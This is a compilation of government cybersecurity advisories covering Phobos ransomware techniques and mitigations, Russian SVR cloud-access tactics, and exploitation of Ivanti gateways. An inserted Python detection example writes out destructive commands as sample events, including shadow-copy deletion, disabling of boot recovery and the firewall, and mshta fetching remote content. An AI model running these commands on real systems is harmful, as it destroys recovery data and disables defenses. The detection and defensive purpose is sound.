Technique Title | ID | Use
Registry Run Keys / Startup Folder | T1547.001 | Phobos ransomware operates using the Exec.exe control mechanism and has been observed using Windows Startup folders and Run registry keys.

Table 15: Phobos Threat Actors ATT&CK Techniques for Enterprise – Privilege Escalation

Technique Title | ID | Use
Privilege Escalation | TA0004 | Phobos actors use run commands like 1saas.exe or cmd.exe to deploy additional Phobos payloads with escalated privileges.
Portable Executable Injection | T1055.002 | Phobos actors use Smokeloader to inject code into running processes to identify an entry point through VirtualAlloc or VirtualProtect calls.
Asynchronous Procedure Call | T1055.004 | During phase two of execution, Phobos ransomware sends a callback from an identified entry point.
Access Token Manipulation: Token Impersonation/Theft | T1134.001 | Phobos actors can use Windows API functions to steal tokens.
Create Process with Token | T1134.002 | Phobos actors used Windows API functions to steal tokens, bypass access controls, and create new processes.

Table 16: Phobos Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion

Technique Title | ID | Use
Software Packing | T1027.002 | Phobos actors deployed a packed portable executable (PE) to conceal code.
Embedded Payloads | T1027.009 | Phobos actors embedded the ransomware as a hidden payload by using Smokeloader.
Deobfuscate/Decode Files or Information | T1140 | During phase two of execution, Phobos actors’ malware stores and decrypts information.
System Binary Proxy Execution: Mshta | T1218.005 | Phobos actors used Mshta to execute malicious files.
Impair Defenses | T1562 | Phobos actors can use Universal Virus Sniffer, Process Hacker, and PowerTool to evade detection.
Disable or Modify System Firewall | T1562.004 | Phobos ransomware has been observed bypassing organizational network defense protocols by modifying system firewall configurations.
Table 17: Phobos Threat Actors ATT&CK Techniques for Enterprise – Credential Access

Technique Title | ID | Use
OS Credential Dumping: LSASS Memory | T1003.001 | Phobos actors used Mimikatz to export credentials.
OS Credential Dumping: Cached Domain Credentials | T1003.005 | Phobos actors use cached domain credentials to authenticate as the domain administrator in the event a domain controller is unavailable.
Brute Force | T1110 | Phobos actors may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.
Credentials from Password Stores | T1555 | Phobos actors may search for common password storage locations to obtain user credentials.
Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | Phobos actors use Nirsoft or Passview to export client credentials from web browsers. Phobos actors search for stored credentials in browser clients once they gain initial network access.
Credentials from Password Stores: Password Managers | T1555.005 | Phobos actors targeted victims’ databases for password management software.

Table 18: Phobos Threat Actors ATT&CK Techniques for Enterprise – Discovery

Technique Title | ID | Use
Process Discovery | T1057 | Phobos ransomware is able to run processes.
System Information Discovery | T1082 | Phobos ransomware is able to enumerate connected storage devices.
File and Directory Discovery | T1083 | Phobos ransomware can encrypt user files.
Domain Account | T1087.002 | Phobos threat actors used BloodHound and SharpHound to enumerate Active Directory.

Table 19: Phobos Threat Actors ATT&CK Techniques for Enterprise – Collection

Technique Title | ID | Use
Archive Collected Data | T1560 | Phobos threat actors archive data as either a .rar or .zip file to be later exfiltrated.

Table 20: Phobos Threat Actors ATT&CK Techniques for Enterprise – Command and Control

Technique Title | ID | Use
Data Obfuscation: Protocol Impersonation | T1001.003 | Phobos actors used a stealth process to obfuscate C2 activity.
File Transfer Protocols | T1071.002 | Phobos threat actors used WinSCP to connect the victim’s network to an FTP server.
Ingress Tool Transfer | T1105 | Phobos ransomware extracts its final payload from the hashed file.
Remote Access Software | T1219 | Phobos threat actors used remote access tools to establish a remote connection within the victim’s network.

Table 21: Phobos Threat Actors ATT&CK Techniques for Enterprise – Exfiltration

Technique Title | ID | Use
Exfiltration | TA0010 | Phobos threat actors may use exfiltration techniques to steal data from your network.
Exfiltration Over Alternative Protocol | T1048 | Phobos threat actors use software to export files to a cloud.
Exfiltration to Cloud Storage | T1567.002 | Phobos threat actors use Mega.io to exfiltrate data to a cloud storage service rather than over their primary command and control channel.

Table 22: Phobos Threat Actors ATT&CK Techniques for Enterprise – Impact

Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Phobos threat actors use the Phobos.exe command to encrypt data on all logical drives connected to the network.
Inhibit System Recovery | T1490 | Phobos threat actors may delete or remove backups, including volume shadow copies, from Windows environments to prevent victim data recovery efforts.
Financial Theft | T1657 | Phobos threat actors extort victims for financial gain.

MITIGATIONS

Secure by Design and Default Mitigations: These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices, limiting the impact of ransomware techniques and thus strengthening the security posture of their customers. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.
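The Execution, Defense Evasion and Impact rows in Tables 13, 16 and 22 (T1047, T1218.005, T1562.004, T1490) are the ones that show up as process-creation events on an endpoint, and they can be turned into concrete rules. The following is an added example, not code from this advisory: the command-line patterns are the ones commonly associated with those techniques (shadow-copy deletion through vssadmin and WMIC, bcdedit recovery changes, netsh firewall changes, mshta with remote content) rather than anything quoted from the advisory, and the events are constructed in a Sysmon-like field layout (RecordId, Image, CommandLine) assumed for the example.

```python
"""Behavioural detection for the Phobos execution, defense-evasion and impact
techniques in Tables 13, 16 and 22 (T1047, T1218.005, T1562.004, T1490).

Added example, not from the CISA advisory. The command-line patterns are the
ones commonly used for these techniques; the events below are constructed in
a Sysmon-like (RecordId, Image, CommandLine) shape assumed for the example."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str          # ATT&CK ID from the tables above
    name: str
    image_re: re.Pattern    # matched against the executable's basename
    cmdline_re: re.Pattern  # matched against the full command line


def _r(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.I)


RULES = [
    Rule("T1490", "shadow copies deleted via vssadmin",
         _r(r"vssadmin\.exe$"), _r(r"\bdelete\s+shadows\b")),
    Rule("T1490", "shadow copies deleted via WMIC (also T1047)",
         _r(r"wmic\.exe$"), _r(r"\bshadowcopy\b.*\bdelete\b")),
    Rule("T1490", "boot recovery disabled via bcdedit",
         _r(r"bcdedit\.exe$"),
         _r(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures")),
    Rule("T1562.004", "host firewall disabled via netsh",
         _r(r"netsh\.exe$"),
         _r(r"advfirewall\s+set\s+\w+\s+state\s+off|firewall\s+set\s+opmode\s+(?:mode=)?disable")),
    Rule("T1218.005", "mshta launched with remote or script content",
         _r(r"mshta\.exe$"), _r(r"https?://|\.hta\b|vbscript:|javascript:")),
]


def evaluate(events):
    """Return (record_id, technique, rule_name) for every rule that fires."""
    findings = []
    for ev in events:
        # Normalise to the basename so the rules do not depend on the install path.
        image = ev.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1]
        cmdline = ev.get("CommandLine", "")
        for rule in RULES:
            if rule.image_re.search(image) and rule.cmdline_re.search(cmdline):
                findings.append((ev["RecordId"], rule.technique, rule.name))
    return findings


def ransomware_staging(findings, threshold=2):
    """Pre-encryption pattern: several distinct T1490 actions on one host.

    A single vssadmin call can be an administrator; two or more different
    recovery-inhibition actions in the same batch rarely are."""
    return len({name for _, tech, name in findings if tech == "T1490"}) >= threshold


# Constructed sample events: five technique instances, then two benign commands.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"RecordId": 2, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled no"},
    {"RecordId": 4, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set currentprofile state off"},
    {"RecordId": 5, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/a.hta"},
    {"RecordId": 6, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
    {"RecordId": 7, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall show allprofiles"},
]

if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("ransomware staging pattern:", ransomware_staging(found))
```

Running the same rules over the two benign records at the end (a shadow-copy listing and a firewall query) and confirming they stay silent is the kind of per-technique check the VALIDATE SECURITY CONTROLS section later asks for: the true positives are the test for detection, the benign commands are the test for precision.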
The FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture against actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Secure remote access software by applying recommendations from the joint Guide to Securing Remote Access Software.
• Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlist solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
• Implement log collection best practices and use intrusion detection systems to defend against threat actors manipulating firewall configurations through early detection [CPG 2.T].
• Implement EDR solutions to disrupt threat actor memory allocation techniques.
• Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  - Audit the network for systems using RDP.
  - Close unused RDP ports.
  - Enforce account lockouts after a specified number of attempts.
  - Apply phishing-resistant multifactor authentication (MFA).
  - Log RDP login attempts.
• Disable command-line and scripting activities and permissions [CPG 2.N].
• Review domain controllers, servers, workstations, and Active Directory for new and/or unrecognized accounts [CPG 4.C].
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
• Reduce the threat of credential compromise via the following:
  - Place domain admin accounts in the Protected Users group to prevent caching of password hashes locally.
  - Refrain from storing plaintext credentials in scripts.
  - Implement time-based access for accounts at the admin level and higher [CPG 2.A, 2.E].

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).
• Maintain offline backups of data, and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
• Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies:
  - Use longer passwords consisting of at least 15 characters and no more than 64 characters in length [CPG 2.B].
  - Store passwords in hashed format using industry-recognized password managers.
  - Add password user “salts” to shared login credentials.
  - Avoid reusing passwords [CPG 2.C].
  - Implement multiple failed login attempt account lockouts [CPG 2.G].
  - Disable password “hints.”
  - Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
  - Require administrator credentials to install software.
• Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
• Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
• Install, regularly update, and enable real-time detection for antivirus software on all hosts.
• Disable unused ports and protocols [CPG 2.V].
• Consider adding an email banner to emails received from outside your organization [CPG 2.M].
• Disable hyperlinks in received emails.
• Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].
VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:

1. Select an ATT&CK technique described in this advisory (see Tables 10 through 22).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

• Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
• Resource to mitigate a ransomware attack: CISA, NSA, FBI, and Multi-State Information Sharing and Analysis Center’s (MS-ISAC) Joint #StopRansomware Guide.
• SLTT organizations are encouraged to implement MS-ISAC’s Ransomware Defense-in-Depth guidance.
• No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
• CISA: Known Exploited Vulnerabilities Catalog
• CISA, MITRE: Best Practices for MITRE ATT&CK Mapping
• CISA: Decider Tool
• CISA: Cross-Sector Cybersecurity Performance Goals
• CISA: Secure by Design
• CISA: Implementing Phishing-Resistant MFA
• CISA: Guide to Securing Remote Access Software

REFERENCES

[1] Privacy Affairs: “Moral” 8Base Ransomware Targets 2 New Victims
[2] VMware: 8base ransomware: A Heavy Hitting Player
[3] Infosecurity Magazine: Phobos Ransomware Family Expands With New FAUST Variant
[4] The Record: Hospitals offline across Romania following ransomware attack on IT platform
[5] Comparitech: What is Phobos Ransomware & How to Protect Against It?
[6] Cisco Talos: Understanding the Phobos affiliate structure and activity
[7] Cisco Talos: A deep dive into Phobos ransomware, recently deployed by 8Base group
[8] Malwarebytes Labs: A deep dive into Phobos ransomware
[9] Any Run: Smokeloader
[10] Malpedia: Smokeloader
[11] Truesec: A case of the FAUST Ransomware
[12] VirusTotal: Phobos Domain #1
[13] VirusTotal: Phobos executable: Ahpdate.exe
[14] VirusTotal: Phobos GUI extension: ELF File
[15] VirusTotal: Phobos IP address: 185.202.0[.]111
[16] VirusTotal: Phobos GUI extension: Binary File
[17] Cisco Talos GitHub: IOCs/2023/11/deep-dive-into-phobos-ransomware.txt at main

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Phobos actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered.
Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA at report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472).

DISCLAIMER

The FBI does not conduct its investigative activities or base attribution solely on activities protected by the First Amendment. Your company has no obligation to respond or provide information back to the FBI in response to this engagement. If, after reviewing the information, your company decides to provide referral information to the FBI, it must do so in a manner consistent with federal law. The FBI does not request or expect your company to take any particular action regarding this information other than holding it in confidence due to its sensitive nature. The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, and the MS-ISAC.

ACKNOWLEDGEMENTS

The California Joint Regional Intelligence Center (JRIC, CA) and Israel National Cyber Directorate (INCD) contributed to this CSA.

VERSION HISTORY

February 29, 2024: Initial version.

  • SVR Cyber Actors Adapt Tactics for Initial Cloud Access
    by CISA (CISA Cybersecurity Advisories) on 23 February 2024 at 5:37 pm

    How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure

OVERVIEW

This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear. The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory. This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.

PREVIOUS ACTOR ACTIVITY

The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. SVR actors are also known for:

• The supply chain compromise of SolarWinds software.
• Activity that targeted organizations developing the COVID-19 vaccine.

EVOLVING TTPs

As organizations continue to modernize their systems and move to cloud-based infrastructure, the SVR has adapted to these changes in the operating environment. They have had to move beyond their traditional means of initial access, such as exploiting software vulnerabilities in an on-premises network, and instead target the cloud services themselves. To access the majority of victims’ cloud-hosted networks, actors must first successfully authenticate to the cloud provider. Denying initial access to the cloud environment can prevent the SVR from successfully compromising their target. In contrast, in an on-premises system, more of the network is typically exposed to threat actors. The sections below describe in more detail how SVR actors are adapting to continue their cyber operations for intelligence gain. These TTPs have been observed in the last 12 months.

ACCESS VIA SERVICE AND DORMANT ACCOUNTS

Previous SVR campaigns reveal the actors have successfully used brute forcing [T1110] and password spraying to access service accounts. This type of account is typically used to run and manage applications and services. There is no human user behind them, so they cannot be easily protected with multi-factor authentication (MFA), making these accounts more susceptible to a successful compromise. Service accounts are often also highly privileged, depending on which applications and services they are responsible for managing. Gaining access to these accounts provides threat actors with privileged initial access to a network from which to launch further operations.

SVR campaigns have also targeted dormant accounts belonging to users who no longer work at a victim organization but whose accounts remain on the system [T1078.004]. Following an enforced password reset for all users during an incident, SVR actors have also been observed logging into inactive accounts and following the instructions to reset the password. This has allowed the actor to regain access following incident response eviction activities.

CLOUD-BASED TOKEN AUTHENTICATION

Account access is typically authenticated by either username and password credentials or system-issued access tokens. The NCSC and partners have observed SVR actors using tokens to access their victims’ accounts without needing a password [T1528]. The default validity time of system-issued tokens varies by system; however, cloud platforms should allow administrators to adjust the validity time as appropriate for their users. More information can be found in the mitigations section of this advisory.

ENROLLING NEW DEVICES TO THE CLOUD

On multiple occasions, the SVR have successfully bypassed password authentication on personal accounts using password spraying and credential reuse. SVR actors have then also bypassed MFA through a technique known as “MFA bombing” or “MFA fatigue,” in which the actors repeatedly push MFA requests to a victim’s device until the victim accepts the notification [T1621]. Once an actor has bypassed these systems to gain access to the cloud environment, SVR actors have been observed registering their own device as a new device on the cloud tenant [T1098.005]. If device validation rules are not set up, SVR actors can successfully register their own device and gain access to the network. Where the network has been configured with device enrollment policies, there have been instances in which these measures have defended against SVR actors and denied them access to the cloud tenant.

RESIDENTIAL PROXIES

As network-level defenses improve detection of suspicious activity, SVR actors have looked at other ways to stay covert on the internet. A TTP associated with this actor is the use of residential proxies [T1090.002]. Residential proxies typically make traffic appear to originate from IP addresses within internet service provider (ISP) ranges used for residential broadband customers and hide the true source. This can make it harder to distinguish malicious connections from typical users. This reduces the effectiveness of network defenses that use IP addresses as indicators of compromise, so it is important to consider a variety of information sources, such as application and host-based logging, for detecting suspicious activity.

CONCLUSION

The SVR is a sophisticated actor capable of carrying out a global supply chain compromise such as the 2020 SolarWinds compromise; however, the guidance in this advisory shows that a strong baseline of cyber security fundamentals can help defend against such actors. For organizations that have moved to cloud infrastructure, a first line of defense against an actor such as the SVR should be to protect against the SVR’s TTPs for initial access. By following the mitigations outlined in this advisory, organizations will be in a stronger position to defend against this threat. Once the SVR gain initial access, the actor is capable of deploying highly sophisticated post-compromise capabilities such as MagicWeb, as reported in 2022. Therefore, mitigating against the SVR’s initial access vectors is particularly important for network defenders. CISA has also produced guidance through its Secure Cloud Business Applications (SCuBA) Project, which is designed to protect assets stored in cloud environments. Some of the TTPs listed in this report, such as residential proxies and exploitation of system accounts, are similar to those reported as recently as January 2024 by Microsoft.

MITRE ATT&CK®

This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

Tactic | ID | Technique | Procedure
Credential Access | T1110 | Brute Force | The SVR use password spraying and brute forcing as an initial infection vector.
Initial Access | T1078.004 | Valid Accounts: Cloud Accounts | The SVR use compromised credentials to gain access to accounts for cloud services, including system and dormant accounts.
Credential Access | T1528 | Steal Application Access Token | The SVR use stolen access tokens to log in to accounts without the need for passwords.
Credential Access | T1621 | Multi-Factor Authentication Request Generation | The SVR repeatedly push MFA requests to a victim’s device until the victim accepts the notification, providing the SVR access to the account.
Command and Control | T1090.002 | Proxy: External Proxy | The SVR use open proxies in residential IP ranges to blend in with expected IP address pools in access logs.
Persistence | T1098.005 | Account Manipulation: Device Registration | The SVR attempt to register their own device on the cloud tenant after acquiring access to accounts.

MITIGATION AND DETECTION

A number of mitigations will be useful in defending against the activity described in this advisory:

• Use multi-factor authentication (also called 2-factor authentication or two-step verification) to reduce the impact of password compromises. See NCSC guidance: Multifactor Authentication for Online Services and Setting up 2-Step Verification (2SV).
• Accounts that cannot use 2SV should have strong, unique passwords.
• User and system accounts should be disabled when no longer required, with a “joiners, movers, and leavers” process in place and regular reviews to identify and disable inactive/dormant accounts. See NCSC guidance: 10 Steps to Cyber Security.
• System and service accounts should implement the principle of least privilege, providing tightly scoped access to the resources required for the service to function.
• Canary service accounts should be created which appear to be valid service accounts but are never used by legitimate services. Monitoring and alerting on the use of these accounts provides a high-confidence signal that they are being used illegitimately and should be investigated urgently.
• Session lifetimes should be kept as short as practical to reduce the window of opportunity for an adversary to use stolen session tokens. This should be paired with a suitable authentication method that strikes a balance between regular user authentication and user experience.
• Ensure device enrollment policies are configured to only permit authorized devices to enroll. Use zero-touch enrollment where possible, or if self-enrollment is required then use a strong form of 2SV that is resistant to phishing and prompt bombing. Old devices should be prevented from (re)enrolling when no longer required. See NCSC guidance: Device Security Guidance.
• Consider a variety of information sources, such as application events and host-based logs, to help prevent, detect and investigate potential malicious behavior. Focus on the information sources and indicators of compromise that have a lower false-positive rate. For example, looking for changes to user agent strings that could indicate session hijacking may be more effective than trying to identify connections from suspicious IP addresses. See NCSC guidance: Introduction to Logging for Security Purposes.

DISCLAIMER

This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks, and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation. Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk. All material is UK Crown Copyright.

  • Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways
    by CISA (CISA Cybersecurity Advisories) on 21 February 2024 at 8:30 pm

    SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) and the following partners (hereafter referred to as the authoring organizations) are releasing this joint Cybersecurity Advisory to warn that cyber threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. CISA and authoring organizations appreciate the cooperation of Volexity, Ivanti, Mandiant and other industry partners in the development of this advisory and ongoing incident response activities. Authoring organizations: Federal Bureau of Investigation (FBI) Multi-State Information Sharing & Analysis Center (MS-ISAC) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) United Kingdom National Cyber Security Centre (NCSC-UK) Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment New Zealand National Cyber Security Centre (NCSC-NZ) CERT-New Zealand (CERT NZ) Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise. Cyber threat actors are actively exploiting multiple previously identified vulnerabilities—CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—affecting Ivanti Connect Secure and Ivanti Policy Secure gateways. The vulnerabilities impact all supported versions (9.x and 22.x) and can be used in a chain of exploits to enable malicious cyber threat actors to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges. During multiple incident response engagements associated with this activity, CISA identified that Ivanti’s internal and previous external ICT failed to detect compromise. 
In addition, CISA has conducted independent research in a lab environment validating that the Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able to gain root-level persistence despite issuing factory resets. The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available. If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory. Based upon the authoring organizations’ observations during incident response activities and available industry reporting, as supplemented by CISA’s research findings, the authoring organizations recommend that the safest course of action for network defenders is to assume a sophisticated threat actor may deploy rootkit level persistence on a device that has been reset and lay dormant for an arbitrary amount of time. For example, as outlined in PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure), sophisticated actors may remain silent on compromised networks for long periods. The authoring organizations strongly urge all organizations to consider the significant risk of adversary access to, and persistence on, Ivanti Connect Secure and Ivanti Policy Secure gateways when determining whether to continue operating these devices in an enterprise environment. 
    Note: On February 9, 2024, CISA issued Emergency Directive (ED) 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch (FCEB) agencies to perform specific actions on affected products. The Canadian Centre for Cyber Security also issued an alert, Ivanti Connect Secure and Ivanti Policy Secure gateways zero-day vulnerabilities, which provides periodic updates for IT professionals and managers affected by the Ivanti vulnerabilities.

    Download the PDF version of this report: AA24-060B Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways (PDF, 2.20 MB)

    For a downloadable copy of IOCs, see:

      • AA24-060B STIX XML (XML, 70.12 KB)
      • AA24-060B STIX JSON (JSON, 53.65 KB)

    TECHNICAL DETAILS

    This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques in Appendix C for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

    Overview

    On January 10, 2024, Volexity reported on two vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways observed being chained to achieve unauthenticated remote code execution (RCE):[1]

      • CVE-2023-46805
      • CVE-2024-21887

    Volexity first identified active exploitation in early December 2023, when they detected suspicious lateral movement [TA0008] on the network of one of their network security monitoring service customers. Volexity identified that threat actors exploited the vulnerabilities to implant web shells, including GLASSTOKEN and GIFTEDVISITOR, on internal and external-facing web servers [T1505.003].
    Once successfully deployed, these web shells are used to execute commands on compromised devices.[1] After Ivanti provided initial mitigation guidance in early January, threat actors developed a way to bypass those mitigations to deploy BUSHWALK, LIGHTWIRE, and CHAINLINE web shell variants.[2] Following the actors’ developments, Ivanti disclosed three additional vulnerabilities:

      • CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA that allows an attacker to access restricted resources without authentication.
      • CVE-2024-22024 is an XML vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and ZTA gateways that allows an attacker to access restricted resources without authentication.
      • CVE-2024-21888 is a privilege escalation vulnerability found in the web component of Ivanti Connect Secure and Ivanti Policy Secure. This vulnerability allows threat actors to gain elevated privileges to that of an administrator.

    Observed Threat Actor Activity

    CISA has responded to multiple incidents related to the above vulnerabilities in Ivanti Connect Secure and Policy Secure gateways. In these incidents, actors exploited these CVEs for initial access to implant web shells and to harvest credentials stored on the devices. Post-compromise, the actors moved laterally into domain environments and have been observed leveraging tools that are native to the Ivanti appliances—such as freerdp, ssh, telnet, and nmap libraries—to expand their access to the domain environment. The result, in some cases, was a full domain compromise. During incident response investigations, CISA identified that Ivanti’s internal and external ICT failed to detect compromise.
    The organizations leveraged the integrity checker to identify file mismatches in Ivanti devices; however, CISA incident response analysis confirmed that both the internal and external versions of the ICT were not reliable, because web shells were found on systems that had no file mismatches according to the ICTs. Additionally, forensic analysis showed evidence that the actors were able to clean up their efforts by overwriting files, time-stomping files, and re-mounting the runtime partition to return the appliance to a “clean state.” This reinforces that ICT scans are not reliable as an indicator of previous compromise and can result in a false sense of security that the device is free of compromise.

    As detailed in Appendix A, CISA conducted independent research in a lab environment validating that the ICT is likely insufficient for detecting compromise and that a cyber threat actor may be able to maintain root-level persistence despite issuing factory resets and appliance upgrades.

    INDICATORS OF COMPROMISE

    See Tables 1 – 4 in Appendix B for IOCs related to cyber actors exploiting multiple CVEs related to Ivanti appliances. For additional indicators of compromise, see:

      • Volexity: Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
      • Mandiant: Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation
      • Mandiant: Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation
